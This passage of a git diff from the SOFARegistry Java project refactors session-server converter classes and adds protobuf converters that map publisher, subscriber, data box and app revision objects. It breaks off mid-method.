(Datum datum : datumMap.values()) { - if (datum.getDataId() == null) { - LOGGER.error("ReceivedData convert error,datum dataId is null,datum={}", datum); - continue; - } - if (null == merge) { - //new Datum avoid to change datumMap - merge = new Datum(datum.getDataInfoId(), datum.getDataCenter()); - merge.setDataId(datum.getDataId()); - merge.setGroup(datum.getGroup()); - merge.setInstanceId(datum.getInstanceId()); - } - mergePublisherMap.putAll(datum.getPubMap()); - version = Math.max(version, datum.getVersion()); - } - if (null == merge) { - return null; - } - merge.setVersion(version); - merge.setPubMap(mergePublisherMap); - merge.setDataCenter(ValueConstants.DEFAULT_DATA_CENTER); - return merge; + receivedData.setData(swizzMap); + + return receivedData; + } + + private static void fillRegionDatas(List regionDatas, List datas) { + for (ServerDataBox data : datas) { + DataBox box = new DataBox(); + try { + String dataString = (String) data.extract(); + box.setData(dataString); + regionDatas.add(box); + } catch (Exception e) { + LOGGER.error("ReceivedData convert error", e); + } } + } - public static ReceivedConfigData getReceivedConfigData(ServerDataBox dataBox, - DataInfo dataInfo, Long version) { - ReceivedConfigData receivedConfigData = new ReceivedConfigData(); - - if (dataBox != null) { - DataBox box = new DataBox(); - String dataString = (String) dataBox.getObject(); - box.setData(dataString); - receivedConfigData.setDataBox(box); - } - receivedConfigData.setDataId(dataInfo.getDataId()); - receivedConfigData.setGroup(dataInfo.getDataType()); - receivedConfigData.setInstanceId(dataInfo.getInstanceId()); - receivedConfigData.setVersion(version); + public static ReceivedConfigData getReceivedConfigData( + ServerDataBox dataBox, DataInfo dataInfo, Long version) { + ReceivedConfigData receivedConfigData = new ReceivedConfigData(); - return receivedConfigData; + if (dataBox != null) { + DataBox box = new DataBox(); + String dataString = (String) dataBox.getObject(); + box.setData(dataString); + receivedConfigData.setDataBox(box); } -} \ No newline at end of file + receivedConfigData.setDataId(dataInfo.getDataId()); + receivedConfigData.setGroup(dataInfo.getGroup()); + receivedConfigData.setInstanceId(dataInfo.getInstanceId()); + receivedConfigData.setVersion(DatumVersionUtil.transferDatumVersion(version)); + return receivedConfigData; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverter.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverter.java index 5a8a4380f..acfdc765d 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverter.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverter.java @@ -27,78 +27,85 @@ /** * The type Subscriber converter. + * * @author shangyu.wh * @version $Id : SubscriberConverter.java, v 0.1 2017-12-05 11:00 shangyu.wh Exp $ */ -public class SubscriberConverter { - - /** - * Convert subscriber. - * - * @param subscriberRegister the subscriber register - * @return the subscriber - */ - public static Subscriber convert(SubscriberRegister subscriberRegister) { +public final class SubscriberConverter { + private SubscriberConverter() {} + /** + * Convert subscriber. + * + * @param subscriberRegister the subscriber register + * @return the subscriber + */ + public static Subscriber convert(SubscriberRegister subscriberRegister) { - Converter converter = source -> { - Subscriber subscriber = new Subscriber(); + Converter converter = + source -> { + Subscriber subscriber = new Subscriber(); - subscriber.setAppName(source.getAppName()); - subscriber.setCell(source.getZone()); - subscriber.setClientId(source.getClientId()); - subscriber.setDataId(source.getDataId()); - subscriber.setGroup(source.getGroup()); - subscriber.setInstanceId(source.getInstanceId()); - subscriber.setRegisterId(source.getRegistId()); - subscriber.setProcessId(source.getProcessId()); - subscriber.setVersion(source.getVersion()); - subscriber.setRegisterTimestamp(System.currentTimeMillis()); - subscriber.setClientRegisterTimestamp(source.getTimestamp()); - subscriber.setScope(ScopeEnumConverter.convertToScope(source.getScope())); - subscriber.setSourceAddress(new URL(source.getIp(), source.getPort())); + subscriber.setAppName(source.getAppName()); + subscriber.setCell(source.getZone()); + subscriber.setClientId(source.getClientId()); + subscriber.setDataId(source.getDataId()); + subscriber.setGroup(source.getGroup()); + subscriber.setInstanceId(source.getInstanceId()); + subscriber.setRegisterId(source.getRegistId()); + subscriber.setProcessId(source.getProcessId()); + subscriber.setVersion(source.getVersion()); + subscriber.setRegisterTimestamp(System.currentTimeMillis()); + subscriber.setClientRegisterTimestamp(source.getTimestamp()); + subscriber.setScope(ScopeEnumConverter.convertToScope(source.getScope())); + subscriber.setSourceAddress(new URL(source.getIp(), source.getPort())); + subscriber.setAttributes(source.getAttributes()); + subscriber.setClientVersion(ClientVersion.StoreData); - subscriber.setClientVersion(ClientVersion.StoreData); + DataInfo dataInfo = + new DataInfo(source.getInstanceId(), source.getDataId(), source.getGroup()); - DataInfo dataInfo = new DataInfo(source.getInstanceId(), source.getDataId(), - source.getGroup()); + subscriber.setDataInfoId(dataInfo.getDataInfoId()); - subscriber.setDataInfoId(dataInfo.getDataInfoId()); - - return subscriber; + return subscriber; }; - return converter.convert(subscriberRegister); - } - - /** - * Convert watcher. - * @param configuratorRegister - * @return - */ - public static Watcher convert(ConfiguratorRegister configuratorRegister) { - Converter converter = source -> { - Watcher watcher = new Watcher(); + return converter.convert(subscriberRegister); + } + /** + * Convert watcher. + * + * @param configuratorRegister + * @return + */ + public static Watcher convert(ConfiguratorRegister configuratorRegister) { + Converter converter = + source -> { + Watcher watcher = new Watcher(); - watcher.setAppName(source.getAppName()); - watcher.setCell(source.getZone()); - watcher.setClientId(source.getClientId()); - watcher.setDataId(source.getDataId()); - watcher.setGroup(source.getGroup()); - watcher.setInstanceId(source.getInstanceId()); - watcher.setRegisterId(source.getRegistId()); - watcher.setProcessId(source.getProcessId()); - watcher.setVersion(source.getVersion()); - watcher.setRegisterTimestamp(source.getTimestamp()); - watcher.setSourceAddress(new URL(source.getIp(), source.getPort())); + watcher.setAppName(source.getAppName()); + watcher.setCell(source.getZone()); + watcher.setClientId(source.getClientId()); + watcher.setDataId(source.getDataId()); + watcher.setGroup(source.getGroup()); + watcher.setInstanceId(source.getInstanceId()); + watcher.setRegisterId(source.getRegistId()); + watcher.setProcessId(source.getProcessId()); + watcher.setVersion(source.getVersion()); + watcher.setAttributes(source.getAttributes()); + if (source.getTimestamp() != null) { + watcher.setClientRegisterTimestamp(source.getTimestamp()); + } + watcher.setRegisterTimestamp(source.getTimestamp()); + watcher.setSourceAddress(new URL(source.getIp(), source.getPort())); - watcher.setClientVersion(ClientVersion.StoreData); + watcher.setClientVersion(ClientVersion.StoreData); - DataInfo dataInfo = new DataInfo(source.getInstanceId(), source.getDataId(), - source.getGroup()); + DataInfo dataInfo = + new DataInfo(source.getInstanceId(), source.getDataId(), source.getGroup()); - watcher.setDataInfoId(dataInfo.getDataInfoId()); + watcher.setDataInfoId(dataInfo.getDataInfoId()); - return watcher; + return watcher; }; - return converter.convert(configuratorRegister); - } -} \ No newline at end of file + return converter.convert(configuratorRegister); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/AppRevisionConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/AppRevisionConvertor.java new file mode 100644 index 000000000..202ece976 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/AppRevisionConvertor.java @@ -0,0 +1,82 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.MetaRegister; +import com.alipay.sofa.registry.common.model.client.pb.MetaService; +import com.alipay.sofa.registry.common.model.client.pb.StringList; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; +import java.util.Map.Entry; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionConvertor.java, v 0.1 2021年02月04日 17:34 xiaojian.xj Exp $ + */ +public final class AppRevisionConvertor { + private AppRevisionConvertor() {} + + public static AppRevision convert2Java(MetaRegister metaRegister) { + AppRevision revision = new AppRevision(); + String appName = metaRegister.getApplication(); + revision.setAppName(appName); + revision.setRevision(metaRegister.getRevision()); + revision.setClientVersion(metaRegister.getClientVersion()); + + Map> baseParams = + Maps.newHashMapWithExpectedSize(metaRegister.getBaseParamsMap().size()); + for (Entry entry : metaRegister.getBaseParamsMap().entrySet()) { + List v = Lists.newArrayList(entry.getValue().getValuesList()); + baseParams.put(entry.getKey(), v); + } + revision.setBaseParams(baseParams); + + Map interfaceMap = + Maps.newHashMapWithExpectedSize(metaRegister.getServicesMap().size()); + for (Entry entry : metaRegister.getServicesMap().entrySet()) { + interfaceMap.put(entry.getKey(), MetaServiceConvertor.convert2Java(entry.getValue())); + } + revision.setInterfaceMap(interfaceMap); + return revision; + } + + public static MetaRegister convert2Pb(AppRevision appRevision) { + MetaRegister.Builder builder = MetaRegister.newBuilder(); + + builder.setApplication(appRevision.getAppName()); + builder.setRevision(appRevision.getRevision()); + + for (Entry> entry : + Optional.ofNullable(appRevision.getBaseParams()) + .orElse(Collections.emptyMap()) + .entrySet()) { + StringList.Builder listBuilder = StringList.newBuilder().addAllValues(entry.getValue()); + builder.putBaseParams(entry.getKey(), listBuilder.build()); + } + + for (Entry entry : + Optional.ofNullable(appRevision.getInterfaceMap()) + .orElse(Collections.emptyMap()) + .entrySet()) { + builder.putServices(entry.getKey(), MetaServiceConvertor.convert2Pb(entry.getValue())); + } + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/DataBoxConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/DataBoxConvertor.java new file mode 100644 index 000000000..4941b8a52 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/DataBoxConvertor.java @@ -0,0 +1,131 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.DataBoxPb; +import com.alipay.sofa.registry.common.model.client.pb.DataBoxesPb; +import com.alipay.sofa.registry.core.model.DataBox; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; + +/** + * @author bystander + * @version $Id: DataBoxConvertor.java, v 0.1 2018年03月21日 2:19 PM bystander Exp $ + */ +public class DataBoxConvertor { + + public static DataBox convert2Java(DataBoxPb dataBoxPb) { + + if (dataBoxPb == null) { + return null; + } else { + DataBox dataBoxJava = new DataBox(); + dataBoxJava.setData(dataBoxPb.getData()); + return dataBoxJava; + } + } + + public static DataBoxPb convert2Pb(DataBox dataBoxJava) { + + if (dataBoxJava == null) { + return null; + } else { + DataBoxPb.Builder builder = DataBoxPb.newBuilder(); + + if (dataBoxJava.getData() != null) { + builder.setData(dataBoxJava.getData()); + } + return builder.build(); + } + } + + public static List convertBoxes2Javas(List dataBoxPbs) { + + List result = new ArrayList<>(); + if (dataBoxPbs == null) { + return null; + } else { + + for (DataBoxPb dataBoxPb : dataBoxPbs) { + result.add(convert2Java(dataBoxPb)); + } + + return result; + } + } + + public static List convert2Pbs(List dataBoxJavas) { + + List result = new ArrayList<>(); + if (dataBoxJavas == null) { + return null; + } else { + + for (DataBox dataBoxJava : dataBoxJavas) { + result.add(convert2Pb(dataBoxJava)); + } + + return result; + } + } + + public static List convertBoxes2Javas(DataBoxesPb dataBoxesPb) { + if (dataBoxesPb == null) { + return null; + } else { + + return convertBoxes2Javas(dataBoxesPb.getDataList()); + } + } + + public static Map> convert2JavaMaps(Map mapPb) { + if (mapPb == null) { + return null; + } else { + Map> mapJava = new HashMap<>(); + + for (Entry entry : mapPb.entrySet()) { + mapJava.put(entry.getKey(), convertBoxes2Javas(entry.getValue())); + } + + return mapJava; + } + } + + private static DataBoxesPb convertBoxes2Pbs(List dataBoxes) { + if (dataBoxes == null) { + return null; + } + return DataBoxesPb.newBuilder().addAllData(convert2Pbs(dataBoxes)).build(); + } + + public static Map convert2PbMaps(Map> mapJava) { + if (null == mapJava) { + return null; + } + + Map mapPb = new HashMap<>(); + + for (Entry> entry : mapJava.entrySet()) { + mapPb.put(entry.getKey(), convertBoxes2Pbs(entry.getValue())); + } + return mapPb; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/ListStringConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/ListStringConvertor.java new file mode 100644 index 000000000..26e849ec6 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/ListStringConvertor.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.google.protobuf.ProtocolStringList; +import java.util.ArrayList; +import java.util.List; + +/** + * @author bystander + * @version $Id: ListStringConvertor.java, v 0.1 2018年03月21日 3:28 PM bystander Exp $ + */ +public class ListStringConvertor { + + public static List convert2Java(ProtocolStringList list) { + + if (list == null) { + return null; + } else { + return new ArrayList<>(list); + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/MetaServiceConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/MetaServiceConvertor.java new file mode 100644 index 000000000..0c8cd243e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/MetaServiceConvertor.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.MetaService; +import com.alipay.sofa.registry.common.model.client.pb.StringList; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import java.util.Optional; + +/** + * @author xiaojian.xj + * @version $Id: MetaServiceConvertor.java, v 0.1 2021年02月04日 22:27 xiaojian.xj Exp $ + */ +public class MetaServiceConvertor { + + public static MetaService convert2Pb(AppRevisionInterface service) { + + MetaService.Builder serviceBuilder = MetaService.newBuilder(); + serviceBuilder.setId(service.getId()); + + for (Entry> entry : + Optional.ofNullable(service.getServiceParams()).orElse(new HashMap<>()).entrySet()) { + StringList.Builder listBuilder = StringList.newBuilder().addAllValues(entry.getValue()); + serviceBuilder.putParams(entry.getKey(), listBuilder.build()); + } + + return serviceBuilder.build(); + } + + public static AppRevisionInterface convert2Java(MetaService metaService) { + + AppRevisionInterface appRevisionInterface = new AppRevisionInterface(); + appRevisionInterface.setId(metaService.getId()); + Map> serviceParams = new HashMap<>(); + for (Entry paramEntry : + Optional.ofNullable(metaService.getParamsMap()).orElse(new HashMap<>()).entrySet()) { + StringList value = paramEntry.getValue(); + serviceParams.put( + paramEntry.getKey(), value.getValuesList().subList(0, value.getValuesCount())); + } + appRevisionInterface.setServiceParams(serviceParams); + + return appRevisionInterface; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/PublisherRegisterConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/PublisherRegisterConvertor.java new file mode 100644 index 000000000..48b3bc526 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/PublisherRegisterConvertor.java @@ -0,0 +1,95 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb; +import com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb; +import com.alipay.sofa.registry.core.model.PublisherRegister; + +/** + * @author bystander + * @version $Id: PublisherRegisterConvertor.java, v 0.1 2018年03月21日 2:06 PM bystander Exp $ + */ +public final class PublisherRegisterConvertor { + private PublisherRegisterConvertor() {} + + public static PublisherRegisterPb convert2Pb(PublisherRegister publisherRegisterJava) { + + if (publisherRegisterJava == null) { + return null; + } + + PublisherRegisterPb.Builder builder = PublisherRegisterPb.newBuilder(); + + BaseRegisterPb.Builder baseRegisterBuilder = BaseRegisterPb.newBuilder(); + + baseRegisterBuilder + .setAppName(publisherRegisterJava.getAppName()) + .setClientId(publisherRegisterJava.getClientId()) + .setDataId(publisherRegisterJava.getDataId()) + .setDataInfoId(publisherRegisterJava.getDataInfoId()) + .setEventType(publisherRegisterJava.getEventType()) + .setGroup(publisherRegisterJava.getGroup()) + .setInstanceId(publisherRegisterJava.getInstanceId()) + .setIp(publisherRegisterJava.getIp()) + .setPort(publisherRegisterJava.getPort()) + .setProcessId(publisherRegisterJava.getProcessId()) + .setRegistId(publisherRegisterJava.getRegistId()) + .setVersion(publisherRegisterJava.getVersion()) + .setTimestamp(publisherRegisterJava.getTimestamp()) + .putAllAttributes(publisherRegisterJava.getAttributes()); + + if (publisherRegisterJava.getZone() != null) { + baseRegisterBuilder.setZone(publisherRegisterJava.getZone()); + } + + builder.setBaseRegister(baseRegisterBuilder.build()); + + builder.addAllDataList(DataBoxConvertor.convert2Pbs(publisherRegisterJava.getDataList())); + return builder.build(); + } + + public static PublisherRegister convert2Java(PublisherRegisterPb publisherRegisterPb) { + + if (publisherRegisterPb == null) { + return null; + } + + PublisherRegister publisherRegister = new PublisherRegister(); + + publisherRegister.setAppName(publisherRegisterPb.getBaseRegister().getAppName()); + publisherRegister.setClientId(publisherRegisterPb.getBaseRegister().getClientId()); + publisherRegister.setDataId(publisherRegisterPb.getBaseRegister().getDataId()); + publisherRegister.setDataInfoId(publisherRegisterPb.getBaseRegister().getDataInfoId()); + publisherRegister.setEventType(publisherRegisterPb.getBaseRegister().getEventType()); + publisherRegister.setGroup(publisherRegisterPb.getBaseRegister().getGroup()); + publisherRegister.setInstanceId(publisherRegisterPb.getBaseRegister().getInstanceId()); + publisherRegister.setIp(publisherRegisterPb.getBaseRegister().getIp()); + publisherRegister.setPort(publisherRegisterPb.getBaseRegister().getPort()); + publisherRegister.setProcessId(publisherRegisterPb.getBaseRegister().getProcessId()); + publisherRegister.setRegistId(publisherRegisterPb.getBaseRegister().getRegistId()); + publisherRegister.setTimestamp(publisherRegisterPb.getBaseRegister().getTimestamp()); + publisherRegister.setVersion(publisherRegisterPb.getBaseRegister().getVersion()); + publisherRegister.setDataList( + DataBoxConvertor.convertBoxes2Javas(publisherRegisterPb.getDataListList())); + publisherRegister.setAttributes(publisherRegisterPb.getBaseRegister().getAttributesMap()); + if (publisherRegisterPb.getBaseRegister().getZone() != null) { + publisherRegister.setZone(publisherRegisterPb.getBaseRegister().getZone()); + } + return publisherRegister; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/ReceivedDataConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/ReceivedDataConvertor.java new file mode 100644 index 000000000..784773384 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/ReceivedDataConvertor.java @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb; +import com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb; +import com.alipay.sofa.registry.core.model.ReceivedConfigData; +import com.alipay.sofa.registry.core.model.ReceivedData; + +/** + * @author bystander + * @version $Id: ReceivedDataConvertor.java, v 0.1 2018年03月21日 2:07 PM bystander Exp $ + */ +public final class ReceivedDataConvertor { + private ReceivedDataConvertor() {} + + public static ReceivedData convert2Java(ReceivedDataPb receivedDataPb) { + + if (receivedDataPb == null) { + return null; + } + + ReceivedData receivedData = new ReceivedData(); + + receivedData.setData(DataBoxConvertor.convert2JavaMaps(receivedDataPb.getDataMap())); + receivedData.setDataId(receivedDataPb.getDataId()); + receivedData.setGroup(receivedDataPb.getGroup()); + receivedData.setInstanceId(receivedDataPb.getInstanceId()); + receivedData.setLocalZone(receivedDataPb.getLocalZone()); + receivedData.setScope(receivedDataPb.getScope()); + receivedData.setSegment(receivedDataPb.getSegment()); + receivedData.setSubscriberRegistIds( + ListStringConvertor.convert2Java(receivedDataPb.getSubscriberRegistIdsList())); + receivedData.setVersion(receivedDataPb.getVersion()); + + return receivedData; + } + + public static ReceivedDataPb convert2Pb(ReceivedData receivedDataJava) { + + if (receivedDataJava == null) { + return null; + } + + ReceivedDataPb.Builder builder = ReceivedDataPb.newBuilder(); + + builder + .setDataId(receivedDataJava.getDataId()) + .setGroup(receivedDataJava.getGroup()) + .setInstanceId(receivedDataJava.getInstanceId()) + .setLocalZone(receivedDataJava.getLocalZone()) + .setScope(receivedDataJava.getScope()) + .setSegment(receivedDataJava.getSegment()) + .setVersion(receivedDataJava.getVersion()) + .addAllSubscriberRegistIds(receivedDataJava.getSubscriberRegistIds()) + .putAllData(DataBoxConvertor.convert2PbMaps(receivedDataJava.getData())); + + return builder.build(); + } + + public static ReceivedConfigDataPb convert2Pb(ReceivedConfigData receivedConfigData) { + + if (receivedConfigData == null) { + return null; + } + + ReceivedConfigDataPb.Builder builder = ReceivedConfigDataPb.newBuilder(); + + builder + .setDataId(receivedConfigData.getDataId()) + .setGroup(receivedConfigData.getGroup()) + .setInstanceId(receivedConfigData.getInstanceId()) + .setVersion(receivedConfigData.getVersion()) + .addAllConfiguratorRegistIds(receivedConfigData.getConfiguratorRegistIds()) + .setDataBox(DataBoxConvertor.convert2Pb(receivedConfigData.getDataBox())); + + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/RegisterResponseConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/RegisterResponseConvertor.java new file mode 100644 index 000000000..74c016343 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/RegisterResponseConvertor.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb; +import com.alipay.sofa.registry.core.model.RegisterResponse; + +/** + * @author bystander + * @version $Id: RegisterResponseConvertor.java, v 0.1 2018年03月21日 2:07 PM bystander Exp $ + */ +public class RegisterResponseConvertor { + + public static RegisterResponse convert2Java(RegisterResponsePb registerResponsePb) { + + if (registerResponsePb == null) { + return null; + } + + RegisterResponse registerResponse = new RegisterResponse(); + + registerResponse.setMessage(registerResponsePb.getMessage()); + registerResponse.setRefused(registerResponsePb.getRefused()); + registerResponse.setRegistId(registerResponsePb.getRegistId()); + registerResponse.setSuccess(registerResponsePb.getSuccess()); + registerResponse.setVersion(registerResponsePb.getVersion()); + + return registerResponse; + } + + public static RegisterResponsePb convert2Pb(RegisterResponse registerResponseJava) { + + if (registerResponseJava == null) { + return null; + } + + RegisterResponsePb.Builder builder = RegisterResponsePb.newBuilder(); + + if (null != registerResponseJava.getMessage()) { + builder.setMessage(registerResponseJava.getMessage()); + } + if (null != registerResponseJava.getRegistId()) { + builder.setRegistId(registerResponseJava.getRegistId()); + } + builder.setVersion(registerResponseJava.getVersion()); + builder.setRefused(registerResponseJava.isRefused()); + builder.setSuccess(registerResponseJava.isSuccess()); + + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SubscriberRegisterConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SubscriberRegisterConvertor.java new file mode 100644 index 000000000..1f19dac61 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SubscriberRegisterConvertor.java @@ -0,0 +1,92 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb; +import com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb; +import com.alipay.sofa.registry.core.model.SubscriberRegister; + +/** + * @author bystander + * @version $Id: SubscriberRegisterConvertor.java, v 0.1 2018年03月21日 2:07 PM bystander Exp $ + */ +public final class SubscriberRegisterConvertor { + private SubscriberRegisterConvertor() {} + + public static SubscriberRegister convert2Java(SubscriberRegisterPb subscriberRegisterPb) { + + if (subscriberRegisterPb == null) { + return null; + } + + SubscriberRegister subscriberRegister = new SubscriberRegister(); + + subscriberRegister.setAppName(subscriberRegisterPb.getBaseRegister().getAppName()); + subscriberRegister.setClientId(subscriberRegisterPb.getBaseRegister().getClientId()); + subscriberRegister.setDataId(subscriberRegisterPb.getBaseRegister().getDataId()); + subscriberRegister.setDataInfoId(subscriberRegisterPb.getBaseRegister().getDataInfoId()); + subscriberRegister.setEventType(subscriberRegisterPb.getBaseRegister().getEventType()); + subscriberRegister.setGroup(subscriberRegisterPb.getBaseRegister().getGroup()); + subscriberRegister.setZone(subscriberRegisterPb.getBaseRegister().getZone()); + subscriberRegister.setInstanceId(subscriberRegisterPb.getBaseRegister().getInstanceId()); + subscriberRegister.setIp(subscriberRegisterPb.getBaseRegister().getIp()); + subscriberRegister.setPort(subscriberRegisterPb.getBaseRegister().getPort()); + subscriberRegister.setProcessId(subscriberRegisterPb.getBaseRegister().getProcessId()); + subscriberRegister.setRegistId(subscriberRegisterPb.getBaseRegister().getRegistId()); + subscriberRegister.setTimestamp(subscriberRegisterPb.getBaseRegister().getTimestamp()); + subscriberRegister.setVersion(subscriberRegisterPb.getBaseRegister().getVersion()); + + subscriberRegister.setAttributes(subscriberRegisterPb.getBaseRegister().getAttributesMap()); + + subscriberRegister.setScope(subscriberRegisterPb.getScope()); + return subscriberRegister; + } + + public static SubscriberRegisterPb convert2Pb(SubscriberRegister subscriberRegisterJava) { + + if (subscriberRegisterJava == null) { + return null; + } + + SubscriberRegisterPb.Builder builder = SubscriberRegisterPb.newBuilder(); + + BaseRegisterPb.Builder baseRegisterBuilder = BaseRegisterPb.newBuilder(); + + 